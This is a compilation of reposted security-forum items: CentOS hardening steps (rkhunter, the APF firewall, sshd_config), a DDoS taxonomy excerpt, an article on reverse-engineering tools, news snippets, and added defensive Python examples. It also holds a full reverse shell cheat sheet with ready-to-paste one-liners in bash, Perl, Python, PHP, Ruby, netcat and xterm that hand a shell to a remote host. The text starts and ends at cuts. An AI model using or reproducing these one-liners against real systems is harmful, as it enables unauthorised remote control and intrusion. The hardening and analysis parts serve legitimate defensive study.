Step 2.3: Chmod rkhunter.sh to root only
chmod 700 /etc/cron.daily/rkhunter.sh

There you go! It should be installed, and you will get a daily mail with the status of your system.

Source: Install RKHunter | SecureCentos.com
  12. Install Firewall

A guide for installing CSF Firewall will come later.. APF is used because it's the site admin's favorite, and it's stable and simple to set up. Might be better for new guys? Fuel for discussion.

Product Name: APF (Advanced Policy Firewall)
Product Version: 0.9.7 rev:1
Homepage: Advanced Policy Firewall | R-fx Networks
Description: Advanced Policy Firewall (APF) is an iptables (netfilter) based firewall system designed around the essential needs of today's Internet deployed servers and the unique needs of custom deployed Linux installations. The configuration of APF is designed to be very informative and present the user with an easy to follow process, from top to bottom of the configuration file. The management of APF on a day-to-day basis is conducted from the command line with the apf command, which includes detailed usage information and all the features one would expect from a current and forward thinking firewall solution.

Pre Setup: Make sure iptables is installed
yum install iptables* -y
Step 1: Download, unpack and install APF from source.
cd /usr/local/src
wget http://www.rfxn.com/downloads/apf-current.tar.gz
tar -zxf apf-current.tar.gz
cd apf-9*
./install.sh
Step 1.1: Cleanup source install files.
rm -Rf /usr/local/src/apf-9* && cd
Step 2: Backup original apf config
cp /etc/apf/conf.apf /etc/apf/conf.apf.bak
Step 3: Edit current APF Config
nano -w /etc/apf/conf.apf
Change:
* RAB="0" to RAB="1"
* RAB_PSCAN_LEVEL="2" to RAB_PSCAN_LEVEL="3"
* TCR_PASS="1" to TCR_PASS="0"
* DLIST_PHP="0" to DLIST_PHP="1"
* DLIST_SPAMHAUS="0" to DLIST_SPAMHAUS="1"
* DLIST_DSHIELD="0" to DLIST_DSHIELD="1"
* DLIST_RESERVED="0" to DLIST_RESERVED="1"
Step 3.1: Find IFACE_IN= and IFACE_OUT= in /etc/apf/conf.apf and verify that they match your network interface
Step 3.2: Locate HELPER_SSH_PORT="22" and change it to your SSH port IF you changed it in your sshd_config
Step 3.3: Locate IG_TCP_CPORTS="22" and change it to your SSH port IF you changed it in your sshd_config
REMEMBER: MAKE SURE YOU CHANGE YOUR SSHD PORT IN APF IF YOU CHANGED IT IN SSHD_CONFIG
You can run this command "cat /etc/ssh/sshd_config | grep Port" to see what port your SSHD uses
Step 4: Restart APF
/usr/local/sbin/apf -r
Step 5: Now relogin through ssh again, to verify that you still can log in to your server
Step 6: When you're happy with your firewall and everything works fine, edit /apf.conf, find DEVEL_MODE="1" and change it to DEVEL_MODE="0"
Step 7: Restart APF again
/usr/local/sbin/apf -r
Step 8: Make sure APF starts automatically after restart
chkconfig --add apf
chkconfig --level 345 apf on
You should NOW have a firewall up and running! Enjoy

Port setting examples for different hosting control panels:
Directadmin:
IG_TCP_CPORTS="21,22,25,53,80,110,111,143,443,587,953,2222,3306,32769"
IG_UDP_CPORTS="53,111,631,724,5353,32768,32809"
EGF="1"
EG_TCP_CPORTS="21,22,25,26,27,37,43,53,80,110,113,443,465,873,2089"
EG_UDP_CPORTS="20,21,37,53,873"
Cpanel:
IG_TCP_CPORTS="20,21,22,25,26,53,80,110,143,443,465,993,995,2082,2083,2086,2087,2095,2096"
IG_UDP_CPORTS="21,53,873"
EGF="1"
EG_TCP_CPORTS="21,22,25,26,27,37,43,53,80,110,113,443,465,873,2089"
EG_UDP_CPORTS="20,21,37,53,873"

Troubleshooting:
Problem: If you get this error: apf(xxxxx): {glob} unable to load iptables module (ip_tables), aborting.
Solution: Try changing SET_MONOKERN="0" to SET_MONOKERN="1", then apf -r
Problem: If you get this message: apf(xxxxx): {glob} !!DEVELOPMENT MODE ENABLED!! - firewall will flush every 5 minutes.
Solution: you need to change DEVEL_MODE=1 to DEVEL_MODE=0; make sure your config is working first.
Source: Install Firewall | SecureCentos.com
  13. Hardening SSHD

Step 1: First of all we need to make a regular user, since we are disabling direct root login:
adduser admin && passwd admin
Step 2: Backup your current sshd_config
mv /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
Step 3: Create a new sshd_config file
nano -w /etc/ssh/sshd_config
Step 3.1: Paste this code into the new file
## Changing to another port is recommended, e.g. 2488
Port 22
## Sets listening address on server. default=0.0.0.0
#ListenAddress 192.168.0.1
## Enforcing SSH Protocol 2 only
Protocol 2
## Disable direct root login; with "no" you need to log in as the admin user, then "su -" into root
PermitRootLogin no
## UsePrivilegeSeparation yes
## AllowTcpForwarding no
## Disables X11Forwarding
X11Forwarding no
## Checks users' home directory and rhosts files, that they aren't world-writable
StrictModes yes
## The option IgnoreRhosts specifies whether rhosts or shosts files should not be used in authentication
IgnoreRhosts yes
## HostbasedAuthentication no
## RhostsAuthentication specifies whether sshd can try to use rhosts based authentication.
RhostsRSAAuthentication no
## Adds a login banner that the user can see
Banner /etc/motd
## Enable / Disable sftp server
#Subsystem sftp /usr/libexec/openssh/sftp-server
## Add users that are allowed to log in
AllowUsers admin
Control + X to save
Step 4: Verify the settings in the sshd_config you created
nano -w /etc/ssh/sshd_config
REMEMBER YOU SHOULD CHANGE THE PORT TO SOMETHING ELSE. (Example: Port 2488)
Step 5.1: Add text to the MOTD banner file (/etc/motd)
nano -w /etc/motd
Step 5.2: Add this text, or something else of your choice
Private system, please log off.
Step 6: Restart the SSHD daemon
service sshd restart
Step 7: Start a NEW client, and test that you can connect on the new port. (DO NOT CLOSE THE CURRENT SSH CLIENT IN CASE OF PROBLEMS)
Source: Hardening SSHD | SecureCentos.com
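Added example, not from either SecureCentos post: a Python audit of the settings the two posts above (Install Firewall and Hardening SSHD) tell you to change, with the cross-check both posts shout about, that the port sshd listens on is also open in conf.apf. The sample sshd_config and conf.apf contents are constructed; the expected values mirror the posts. One caveat the script encodes that the posts do not mention: sshd uses the first value it reads for a keyword, so appending hardening lines below an older "PermitRootLogin yes" changes nothing, while conf.apf is shell syntax, where the last assignment wins.

```python
"""Audit sshd_config and APF conf.apf against the two SecureCentos posts and cross-check that
the SSH port is open in APF. Added example with constructed sample files."""
import re

# Directives the SSHD post sets (compared case-insensitively), and the conf.apf values from
# the firewall post's Step 3 plus DEVEL_MODE="0" from its Step 6.
SSHD_EXPECTED = {"protocol": "2", "permitrootlogin": "no", "x11forwarding": "no",
                 "strictmodes": "yes", "ignorerhosts": "yes", "rhostsrsaauthentication": "no"}
APF_EXPECTED = {"RAB": "1", "RAB_PSCAN_LEVEL": "3", "TCR_PASS": "0", "DLIST_PHP": "1",
                "DLIST_SPAMHAUS": "1", "DLIST_DSHIELD": "1", "DLIST_RESERVED": "1", "DEVEL_MODE": "0"}


def parse_sshd_config(text):
    """Return ({keyword: value}, [ports]). sshd keeps the FIRST value it reads for a keyword;
    Port is the exception, every Port line adds a listener. Parsing stops at a Match block."""
    first, ports = {}, []
    for raw in text.splitlines():
        m = re.match(r"(\S+?)(?:\s*=\s*|\s+)(.+)$", raw.split("#", 1)[0].strip())
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            break
        if key == "port":
            ports.append(value)
        else:
            first.setdefault(key, value)
    return first, ports


def parse_apf_conf(text):
    """conf.apf is shell syntax (KEY="value"), so the LAST assignment wins, unlike sshd."""
    conf = {}
    for raw in text.splitlines():
        m = re.match(r'\s*([A-Z0-9_]+)="?([^"#]*)"?', raw)
        if m:
            conf[m.group(1)] = m.group(2).strip()
    return conf


def audit(sshd_text, apf_text):
    """Return a list of findings; an empty list means both files match the posts."""
    findings = []
    sshd, ports = parse_sshd_config(sshd_text)
    ports = ports or ["22"]  # sshd's default when no Port line is present
    for key, want in SSHD_EXPECTED.items():
        got = sshd.get(key)
        if got is None:
            findings.append(f"sshd_config: {key} not set, want {want}")
        elif got.lower() != want:
            findings.append(f"sshd_config: {key} is '{got}', want '{want}' (first value wins)")
    if "allowusers" not in sshd:
        findings.append("sshd_config: no AllowUsers line, any account may try to log in")
    if "22" in ports:
        findings.append("sshd_config: still listening on port 22, the post recommends moving it")
    apf = parse_apf_conf(apf_text)
    for key, want in APF_EXPECTED.items():
        if apf.get(key) != want:
            findings.append(f"conf.apf: {key}={apf.get(key)!r}, want {want!r}")
    open_tcp = {p.strip() for p in apf.get("IG_TCP_CPORTS", "").split(",")}
    for port in ports:
        if port not in open_tcp:
            findings.append(f"conf.apf: sshd port {port} missing from IG_TCP_CPORTS (lock-out risk)")
        if apf.get("HELPER_SSH_PORT") != port:
            findings.append(f"conf.apf: HELPER_SSH_PORT={apf.get('HELPER_SSH_PORT')!r}, sshd uses {port}")
    return findings


# Constructed samples: a half-done hardening, then a pair that follows both posts
# (SSH moved to 2488 and that port opened in APF).
SSHD_BEFORE = """Port 22
Protocol 2
PermitRootLogin yes
PermitRootLogin no   # appended later; sshd still uses the 'yes' above
X11Forwarding no
StrictModes yes
IgnoreRhosts yes
RhostsRSAAuthentication no
"""
APF_BEFORE = ('DEVEL_MODE="1"\nRAB="0"\nRAB_PSCAN_LEVEL="2"\nTCR_PASS="1"\nDLIST_PHP="0"\n'
              'DLIST_SPAMHAUS="0"\nDLIST_DSHIELD="0"\nDLIST_RESERVED="0"\n'
              'HELPER_SSH_PORT="22"\nIG_TCP_CPORTS="22,80,443"\n')
SSHD_AFTER = """Port 2488
Protocol 2
PermitRootLogin no
X11Forwarding no
StrictModes yes
IgnoreRhosts yes
RhostsRSAAuthentication no
Banner /etc/motd
AllowUsers admin
"""
APF_AFTER = ('DEVEL_MODE="0"\nRAB="1"\nRAB_PSCAN_LEVEL="3"\nTCR_PASS="0"\nDLIST_PHP="1"\n'
             'DLIST_SPAMHAUS="1"\nDLIST_DSHIELD="1"\nDLIST_RESERVED="1"\n'
             'HELPER_SSH_PORT="2488"\nIG_TCP_CPORTS="2488,80,443"\n')

if __name__ == "__main__":
    print("before:", *audit(SSHD_BEFORE, APF_BEFORE), sep="\n  ")
    print("after:", audit(SSHD_AFTER, APF_AFTER) or "OK")
```

Run it against the real files (audit(open('/etc/ssh/sshd_config').read(), open('/etc/apf/conf.apf').read())) before the restart in Step 4 and keep the existing SSH session open as the post says; sshd -t catches syntax errors in sshd_config but not a port the firewall is about to block.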
  14. Taxonomy of DDoS Attacks Property of RioRey, Inc. © 2009 - 2011 1. SYN Flood. Clients generate a SYN packet (64 bytes) to request a new session from a host server. As the TCP three-way communication handshake is created, the host will track and allocate each of the client’s sessions until the session is closed. In a SYN flood, a victim server receives spoofed SYN requests at a high packet rate that contain fake source IP addresses. The SYN flood overwhelms the victim server by depleting its system resources (connection table memory) normally used to store and process these incoming packets, resulting in performance degradation or a complete server shutdown. A well-crafted SYN flood often fools deep-packet inspection filtering techniques. SYN-Cookie defense can be used to defend against large-scale SYN floods but this requires all servers to support this capability. 2. SYN-ACK Flood. Host servers generate SYN-ACK packets in response to incoming SYN requests from clients. During a SYN-ACK flood, the victim server receives spoofed SYN-ACK packets at a high packet rate. This flood exhausts a victim’s server by depleting its system resources (memory, CPU, etc.) used to compute this irregularity, resulting in performance degradation or a complete server shutdown. 3. ACK & PUSH ACK Flood. After a TCP-SYN session is established between a host and a client, ACK or PUSH ACK packets are used to communicate information back and forth between the two until the session is closed. During an ACK flood, a victim receives spoofed ACK packets at a high packet rate that fail to belong to any session within the server’s connection list. The ACK flood exhausts a victim’s server by depleting its system resources (memory, CPU, etc.) used to match these incoming packets, resulting in performance degradation or a complete server shutdown. ........................................................................................ 
Download: http://www.riorey.com/x-resources/2011/RioRey_Taxonomy_DDoS_Attacks_2.2_2011.pdf
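The SYN-cookie defense named under SYN Flood above, as an added Python example that is not from the RioRey paper: a simplified version of the Bernstein/Linux scheme, in which the server encodes a timestamp, an MSS class and a keyed hash of the 4-tuple into the initial sequence number instead of storing a half-open connection, and only admits a connection when the client's ACK echoes that value plus one. Addresses, ports, the secret, the MSS table and the 32-bit layout are assumptions for illustration; the kernel implementation differs in details (hash function, timestamp granularity, option handling).

```python
"""Simplified SYN cookies (added example, not from the RioRey paper). The server answers a SYN
with an ISN that encodes a timestamp, an MSS class and a keyed hash of the 4-tuple, stores
nothing, and only creates connection state when the final ACK echoes that value (ack = ISN+1)."""
import hashlib
import hmac

MSS_TABLE = (536, 1300, 1440, 1460)  # assumed MSS classes; the index must fit the 3-bit field


def _hash24(secret, src, sport, dst, dport, t):
    """24-bit keyed hash over the 4-tuple and the 5-bit time counter."""
    msg = f"{src}:{sport}>{dst}:{dport}@{t}".encode()
    return int.from_bytes(hmac.new(secret, msg, hashlib.sha256).digest()[:3], "big")


def make_cookie(secret, src, sport, dst, dport, mss, now_minutes):
    """ISN for the SYN-ACK, Linux-like layout: 5 bits time | 3 bits MSS index | 24 bits hash."""
    fitting = [i for i, m in enumerate(MSS_TABLE) if m <= mss]
    idx = fitting[-1] if fitting else 0
    t = now_minutes & 0x1F
    return (t << 27) | (idx << 24) | _hash24(secret, src, sport, dst, dport, t)


def check_cookie(secret, src, sport, dst, dport, ack, now_minutes, max_age=2):
    """Return the MSS encoded in a valid cookie, or None when the hash does not match the
    4-tuple (spoofed or forged ACK) or the cookie is older than max_age minutes."""
    cookie = (ack - 1) & 0xFFFFFFFF
    t, idx = cookie >> 27, (cookie >> 24) & 0x7
    if (now_minutes - t) & 0x1F > max_age or idx >= len(MSS_TABLE):
        return None
    if (cookie & 0xFFFFFF) != _hash24(secret, src, sport, dst, dport, t):
        return None
    return MSS_TABLE[idx]


class SynCookieServer:
    """Toy listener: SYNs allocate nothing; only ACKs carrying a valid cookie enter the table."""

    def __init__(self, secret, addr, port):
        self.secret, self.addr, self.port = secret, addr, port
        self.established = {}  # (src, sport) -> negotiated MSS

    def on_syn(self, src, sport, mss, now_minutes):
        return make_cookie(self.secret, src, sport, self.addr, self.port, mss, now_minutes)

    def on_ack(self, src, sport, ack, now_minutes):
        mss = check_cookie(self.secret, src, sport, self.addr, self.port, ack, now_minutes)
        if mss is not None:
            self.established[(src, sport)] = mss
        return mss is not None


def flood_then_connect(n_spoofed=10000):
    """Constructed scenario: n spoofed SYNs that never complete, then one real handshake.
    Returns (connection table size after the flood, size after the real ACK)."""
    srv = SynCookieServer(b"rotate-me-periodically", "192.0.2.10", 80)
    for i in range(n_spoofed):  # fake sources never send the ACK, and cost no memory
        srv.on_syn(f"198.51.100.{i % 254 + 1}", 1024 + i, 1460, now_minutes=100)
    after_flood = len(srv.established)
    isn = srv.on_syn("203.0.113.7", 40000, 1460, now_minutes=100)
    srv.on_ack("203.0.113.7", 40000, isn + 1, now_minutes=101)
    return after_flood, len(srv.established)


if __name__ == "__main__":
    print(flood_then_connect())  # (0, 1)
```

The trade-off the paper hints at ("requires all servers to support this capability"): half-open connections cost no memory, but everything the server would normally remember from the SYN (window scale, SACK, the exact MSS) has to be squeezed into the cookie or lost, and each SYN still costs a hash computation, so a cookie-enabled host survives the connection-table exhaustion but not necessarily the packet rate.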
  15. Introduction to Malware & Malware Analysis

by Rajesh Nikam

Introduction
Reverse engineering is the process of analyzing a subject system to identify the system's components and their relationships, and to create representations of the system in another form or at a higher level of abstraction. The process of reverse engineering, which is part of malware analysis, is accomplished using specific tools that are categorized as hex editors, disassemblers/debuggers, decompilers and monitoring tools. Disassemblers/debuggers occupy an important position in the list of reverse engineering tools. A disassembler converts binary code into assembly code. Disassemblers also extract strings, used libraries, and imported and exported functions. Debuggers expand the functionality of disassemblers by supporting the viewing of the stack, the CPU registers, and the hex dumping of the program as it executes. Debuggers allow breakpoints to be set and the assembly code to be edited at runtime. One must be familiar with the Portable Executable (PE) [1] file format before diving into reverse engineering for Windows executables. In this article we will get into important aspects of Hiew, OllyDbg and IDA Pro from a reverse engineer's perspective.

Hiew
Hiew [2], short for Hacker's view, is a great disassembler (note that this is not a debugger) designed for hackers, as the name suggests. It supports three modes - Text, Hexadecimal and Decode (disassembly) mode. The Enter/F4 key is used to switch between these modes. In each mode the Function Line, corresponding to function keys F1 to F12, which appears at the bottom of the Hiew screen, changes, as does its functionality with CTRL, SHIFT and ALT combinations.

PE Header
The PE header can be viewed by pressing F8 from Hex or Decode view. In this mode we can see important properties of the PE file using the following shortcuts:
F6 Sections Table
F7 Import Table
F9 Export Table
F10 Data Directories
F5 Jump to Entry Point
Alt-F2 Jump to end of last section

Search in file
Hiew supports searching a file for an ASCII or HEX sequence of bytes by pressing the F7 key. It also supports a byte wildcard character.
Alt-? Wildcard character
Shift-F7 Repeat search
Alt-F7 Change search direction

Strings
ASCII and Unicode strings are viewed from Text/Hex mode by pressing Alt-F6. This helps to search for juicy strings like suspicious URLs, FTP, SMTP or IRC commands, file names, registry keys etc. in the file. You can jump to the selected string from the string window by pressing ENTER. The +/- keys change the minimum length of displayed strings, which helps to filter out smaller strings. You can apply a filter to the displayed strings using the F9 key.

Moving around
You can jump directly to a specific location by pressing F5 and providing an offset (offset values are hexadecimal). To specify a relative offset, a + or - sign can be used as a prefix to the offset. When the specified offset is a Virtual Address, it should start with ".". Alt-F1 toggles between Virtual Address and file offset. If you want to jump to a specific function or offset which appears as part of a control transfer instruction like call, jmp or a conditional jump, you can press the key that appears at the end of the instruction. Please see Fig.1, marked for label 4. In this case if you press key "4", it will take you to offset 0x010073DA. The 0 or Backspace key is used to jump back to the previous instruction.

Simple Decryption
Hiew supports decryption of a block using simple encryptions like xor, add, rol etc. Press F3 from Hex or Decode view to enter edit mode and then press F7 to add a simple decryption routine. You can set the operand size as byte, word or dword by pressing F2.

Hiew works great when used in combination with a file manager like FAR [3] by configuring its command line. It is a very helpful disassembler to quickly get different aspects of the file under analysis like file header, section information, data directories, imported/exported functions and strings.

OllyDbg
OllyDbg [4][5] is an application-level debugger. The OllyDbg interface shows the disassembly, hex dump, stack, and CPU registers. Additionally, OllyDbg supports run tracing, conditional breakpoints, PE header viewing, hex editing, and plugins. At first startup, OllyDbg asks you to set up the User Data Directory (UDD) and the Plugins directory. The UDD is used to keep information specific to the debugged application, like breakpoints, and obviously you need to save plugins in the Plugins directory. It provides a wide range of debugging options like break on new module or when a thread is created, how to process exceptions etc. OllyDbg supports setting Hardware Breakpoints, Software Breakpoints, Memory Breakpoints and even Conditional Breakpoints. OllyDbg supports plugins to enhance its functionality.

Olly Advanced Plugin
There were some bugs reported with Olly v1.10 related to the string parsing routine and the parsing of faulty executables. This plugin fixes most of these bugs. Some malware samples are loaded with anti-debugging techniques [7]; the Olly Advanced plugin helps to counter most of them.

OllyDump Plugin
OllyDump is used to dump debugged process memory. You can trace the packed file till it reaches the original entry point and then dump the unpacked version of the file from process memory. It provides options to rebuild the Import Address Table (IAT).

OllyScript Plugin
OllyScript is a plugin that lets you automate OllyDbg by writing scripts in an assembly-like language. Many tasks involve a lot of repetitive work just to get to some point in the debugged application. By using this plugin you can write a script once and use it with other similar samples. OpenRCE [8] hosts dozens of scripts that are helpful for finding the original entry point (OEP) of many packers.

IDA Pro
IDA Pro is a powerful disassembler that presents the disassembly in a well-organized format and shows a graph view of the selected function. However, it is less frequently used as a debugger in the reverse engineering community, where OllyDbg steals the top rank. IDA Pro's features include hex editing, string extraction, and import and export viewing. IDA Pro also features a window for viewing all of the functions called by a program, and provides accurate analyses of the program, summarizing them in a color-coded bar at the top of the screen, which classifies the various sections of the program's code. The figure below shows IDA Pro's interface, including the disassembly and the color-coded analysis bar at the top of the screen. The titles of the other windows are visible on the tabs above the disassembly. IDA Pro supports a wide variety of processors like ARM, DEC, Intel, Motorola etc. IDA Pro provides a selection of debuggers:
• Bochs
• Win Debugger
• GDB
• WinDbg
IDA Pro with the Bochs emulator makes an interesting combination that is used to debug an operating system starting from the boot process, and it is helpful in debugging even ROM BIOS and Master Boot Record code. The analysis done on a particular sample, comments added and functions marked can be saved as an .idb file.

IDA Shortcuts
Below is a list of some important IDA shortcuts; for the complete list please visit reference [9].
Enter Go to address or variable
Esc Go back to previous location
; Add inline comment
INSERT | SHIFT ; Add comment
N Rename label, variable, functions etc.
X Show cross references
M Substitute enum
CTRL W Save changes (*don't forget to*)

Extending IDA
IDA supports writing IDC scripts, in a language very similar to C, on top of the powerful IDA disassembler. The functionality of the disassembler can also be used through Python scripts and by writing plugins.

FLIRT (Fast Library Identification and Recognition Technology)
One of the challenges with the disassembly of programs developed with modern high-level languages is to identify library functions. One may end up spending considerable time going through these functions. On the other hand, identification of library functions can considerably ease the analysis of a program. IDA comes with FLIRT to recognize the standard library functions.

One must understand the power of each tool to choose the appropriate tool for a specific requirement during reverse engineering.

References
1. Portable Executable File Format - A Reverse Engineer View. Tuts 4 You: Downloads / Portable Executable Format (PE) / Portable Executable File Format
2. Hiew. Hiew homepage
3. FAR Manager. Far Manager Official Site: main
4. OllyDbg. OllyDbg v1.10
5. OllyDbg Quick Start Guide. Tuts 4 You: Downloads / OllyDbg Tutorials / OllyDbg Quick Start Guide
6. OllyDbg Plugins. OpenRCE
7. Anti-Debugging. http://lilxam.free.fr/repo/hacking/Windows%20Anti-Debug%20Reference.pdf
8. Olly Scripts. OpenRCE
9. IDA Shortcuts. http://www.hex-rays.com/idapro/freefiles/IDA_Pro_Shortcuts.pdf
Source: Tools for Reverse Engineering and Malware Analysis | ClubHACK Magazine
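Added example in Python, not from the ClubHACK article: the "Simple Decryption" step above done by brute force. It tries every single-byte xor/add/sub and every rol/ror amount on a blob and keeps the decodings that are fully printable and contain a string worth a look (URL, IRC command, registry key), the same "juicy strings" the Strings section tells you to hunt for. Only byte-size operands are handled (Hiew's word and dword modes are not); the marker list and the samples are constructed, a URL hidden with xor 0x5A and with rol 3.

```python
"""Brute-force the byte-wise encodings Hiew can undo (XOR/ADD/SUB/ROL/ROR) over a blob and
keep decodings that are fully printable and contain a "juicy" substring. Added example."""
import string

PRINTABLE = frozenset(string.printable.encode("ascii"))

# Substrings worth looking for in decoded data (constructed list; extend for your samples).
MARKERS = (b"http://", b"ftp://", b"PRIVMSG", b"HKEY_", b".exe", b"cmd.exe")


def rol8(b, n):
    """Rotate an 8-bit value left by n."""
    n %= 8
    return ((b << n) | (b >> (8 - n))) & 0xFF


def ror8(b, n):
    """Rotate an 8-bit value right by n (same as rotating left by 8-n)."""
    return rol8(b, 8 - (n % 8))


# Each decoder maps (data, key) -> bytes. Keys: 1..255 for xor/add/sub, 1..7 for rotates.
DECODERS = {
    "xor": (lambda d, k: bytes(b ^ k for b in d), range(1, 256)),
    "add": (lambda d, k: bytes((b + k) & 0xFF for b in d), range(1, 256)),
    "sub": (lambda d, k: bytes((b - k) & 0xFF for b in d), range(1, 256)),
    "rol": (lambda d, k: bytes(rol8(b, k) for b in d), range(1, 8)),
    "ror": (lambda d, k: bytes(ror8(b, k) for b in d), range(1, 8)),
}


def is_printable(data):
    return all(b in PRINTABLE for b in data)


def brute_force(blob, markers=MARKERS):
    """Return [(operation, key, decoded)] for every operation/key whose output is entirely
    printable and contains at least one marker. Printability alone is a weak filter (xor 0x20
    just flips case), which is why a marker is required too."""
    hits = []
    for name, (decode, keys) in DECODERS.items():
        for key in keys:
            out = decode(blob, key)
            if is_printable(out) and any(m in out for m in markers):
                hits.append((name, key, out))
    return hits


# Constructed samples: the same plaintext hidden with XOR 0x5A and with ROL 3.
PLAINTEXT = b"http://c2.example.invalid/update.php?id=1"
SAMPLE_XOR = bytes(b ^ 0x5A for b in PLAINTEXT)
SAMPLE_ROL = bytes(rol8(b, 3) for b in PLAINTEXT)

if __name__ == "__main__":
    for label, blob in (("xor sample", SAMPLE_XOR), ("rol sample", SAMPLE_ROL)):
        for name, key, out in brute_force(blob):
            print(f"{label}: {name} key=0x{key:02x} -> {out.decode()}")
```

rol 5 and ror 3 are the same rotation, so both show up for the second sample; in Hiew you would pick whichever matches the way the malware's own decoder loop is written, since that is what you will be reading in the Decode view.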
  16. Hijacking Facebook Fan Pages It's easier to hijack a Facebook page than you would expect, because of sloppy security from the social network. The question is - will Facebook do anything about it? Video: http://www.securitytube.net/video/2210 In other words: if you are an administrator on a page, you can remove the other administrators, the "original" administrators.
  17. Java 7 Officially Released Published: 2011-09-05, Last Updated: 2011-09-05 13:44:59 UTC by Raul Siles (Version: 2) Oracle officially released Java 7, including some security updates and several new features and enhancements. Thanks ISC reader Alex for notifying us about it. The new Java 7 version coexists with the latest Java 6 Update 27 version and is available for download from the Oracle web site, Oracle Technology Network for Java Developers, and still makes use of different installers for the 32 and 64-bit versions for all operating systems (Linux, Solaris & Windows). As you can see in the release notes, the main security enhancements affect the JSSE (Java Secure Socket Extension) and TLS communications, including TLS v1.1 and v1.2 as well as Server Name Indication (SNI) support. Java 7 does not remove any previous Java versions; I guess this is the intended behavior as this is a major release. From a security perspective, if Java 7 is installed (using Windows as the sample platform) on a system that already has Java 6 installed, both versions will remain, so if you only want to run the latest version, ensure you uninstall any previous versions (as we had to do in the past but with the same major release) and do not leave vulnerable Java 6 releases around. Considering Java is one of the most targeted pieces of client software today, be ready for future updates on both Java 6 and Java 7 in your IT environments (perhaps Java 6u28 and Java 7u1), and plan in advance how to manage them. UPDATE 1: Let's clarify this diary post title a little bit based on txISO's comment (thanks!). If you consider Java to be officially released only when it is available at java.com, then Java has not been officially released yet (see quote on 3rd comment below).
However, if you consider that Java 7 is available out there, not only in its JDK version (what I consider the version for developers), but the JRE (Java Runtime Environment) version too, then IMHO it has been released - although only at oracle.com. Besides that, if you are old Java school and go to the old java.sun.com, you will be redirected to the oracle.com page where Java 7 is available to the public. For our ISC audience, officially or not, get ready for Java 7 as soon as possible: it is out there. Source: ISC Diary | Java 7 Officially Released
  18. skipfish A fully automated, active web application security reconnaissance tool. Key features: High speed: pure C code, highly optimized HTTP handling, minimal CPU footprint - easily achieving 2000 requests per second with responsive targets. Ease of use: heuristics to support a variety of quirky web frameworks and mixed-technology sites, with automatic learning capabilities, on-the-fly wordlist creation, and form autocompletion. Cutting-edge security logic: high quality, low false positive, differential security checks, capable of spotting a range of subtle flaws, including blind injection vectors. The tool is believed to support Linux, FreeBSD, MacOS X, and Windows (Cygwin) environments. Docs: SkipfishDoc - skipfish - Project documentation - web application security scanner - Google Project Hosting Primer: lcamtuf's blog: Understanding and using skipfish Download: http://skipfish.googlecode.com/files/skipfish-2.03b.tgz Source: skipfish - web application security scanner - Google Project Hosting
  19. Reverse Shell Cheat Sheet

If you're lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you'll probably want an interactive shell. If it's not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either throwing back a reverse shell or binding a shell to a TCP port. This page deals with the former. Your options for creating a reverse shell are limited by the scripting languages installed on the target system, though you could probably upload a binary program too if you're suitably well prepared. The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you substitute "/bin/sh -i" with "cmd.exe". Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they're quite short lines, but not very readable.

Bash
Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

PERL
Here's a shorter, feature-free version of the perl-reverse-shell:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
There's also an alternative PERL reverse shell here.

Python
This was tested under Linux / Python 2.7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP
This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn't work, try 4, 5, 6...
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
If you want a .php file to upload, see the more featureful and robust php-reverse-shell.

Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat
Netcat is rarely present on production systems and even if it is, there are several versions of netcat, some of which don't support the -e option.
nc -e /bin/sh 10.0.0.1 1234
If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

xterm
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1
To catch the incoming xterm, start an X-Server (:1 - which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1
You'll need to authorise the target to connect to you (command also run on your host):
xhost +targetip
Source: Reverse Shell Cheat Sheet | pentestmonkey
  20. OSSEC is an Open Source Host-based Intrusion Detection OSSEC is an Open Source Host-based Intrusion Detection System. It performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response. It runs on most operating systems, including Linux, MacOS, Solaris, HP-UX, AIX and Windows. A list with all supported platforms is available here. Docs: Documentation Download: http://www.ossec.net/main/downloads
  21. Linux Kernel Moves To Github

From Linus Torvalds <>
Date Sun, 4 Sep 2011 16:27:25 -0700
Subject Linux 3.1-rc5

So it's been another week, and it's time for another -rc. However, master.kernel.org is still down, and there really hasn't been a ton of development going on, so I considered just skipping a week. But hey, the whole point (well, *one* of the points) of distributed development is that no single place is really any different from any other, so since I did a github account for my divelog thing, why not see how well it holds up to me just putting my whole kernel repo there too? So while kernel.org is down for the count, let's just see how github does:

https://github.com/torvalds/linux.git

NOTE! One thing to look out for when you see a new random public hosting place usage like that is to verify that yes, it's really the person you think it is. So is it? You can take a few different approaches:

(a) Heck, it's open source, I don't care who I pull from, I just want a new kernel, and not having a new update from kernel.org in the last few days, I *really* need my new kernel fix. I'll take it, because I need to exercise my CPU's by building randconfig kernels. Besides, I like living dangerously.

(b) Yeah, the email looks like it comes from Linus, and we all know that SMTP cannot possibly be spoofed, so it must be him.

